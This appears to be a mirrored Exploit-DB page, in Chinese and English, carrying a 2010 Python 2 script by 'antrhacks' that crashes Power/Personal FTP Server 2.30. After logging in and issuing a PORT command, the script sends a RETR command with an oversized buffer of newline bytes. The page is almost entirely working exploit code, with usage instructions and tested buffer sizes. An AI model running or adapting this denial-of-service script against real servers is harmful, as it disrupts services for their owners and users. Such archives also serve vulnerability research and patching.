Power/Personal FTP Server – RETR Denial of Service - 体验盒子

作者： antrhacks

日期： 2010-07-16

类别：

dos

平台：

windows

来源：https://www.exploit-db.com/exploits/14380/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

#!/usr/bin/python

#--------------------------------------------

# Power/Personal FTP Server RETR Command DoS

#--------------------------------------------

# Title: Power/Personat FTP Server RETR Command DoS

# Author: antrhacks

# Software Link: http://www.cooolsoft.com/download/PowerFTP.EXE

# Version: 2.30

# Platform:Windows XP SP3 Home edition Fr

# Tested with buffersize: 82000, 83000, 84000, ... 92000

# Example: ./PowerFTP.py 192.168.0.10 test test 85000

import socket

import sys

# Description:

# RETR command overflow with PORT specified

def howto():

print ("Usage: scriptname.py <IP> <username> <password> <buffersize>\n")

def exploit(host,user,password):

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

sock.bind(('0.0.0.0', 6666)) # Need that for the PORT Command !!!

try:

sock.connect((host, 21))

except:

print ("Unable to connect to host")

sys.exit(1)

r=sock.recv(1024)

print r

r=sock.getsockname()

print r

sock.send("USER " + user + "\r\n")

r=sock.recv(1024)

print r

sock.send("PASS " + password + "\r\n")

r=sock.recv(1024)

print r

sock.send("PORT 192,168,0,11,26,10" + "\r\n") # 26,10 => 0x1a,0x0a => 6666

r=sock.recv(1024)

print r

sock.send("RETR " + buffer + " \r\n")

r=sock.recv(1024)

print r

sock.send("QUIT" + " \r\n")

r=sock.recv(1024)

print r

sock.close()

if len(sys.argv) <> 5:

howto()

sys.exit(1)

else:

host=sys.argv[1]

user=sys.argv[2]

password=sys.argv[3]

buffersize=int(sys.argv[4])

buffer="\x0a\x0a" * buffersize

exploit(host,user,password)

sys.exit(0)

# END

# (2010-07-15) - Inj3ct0r.com -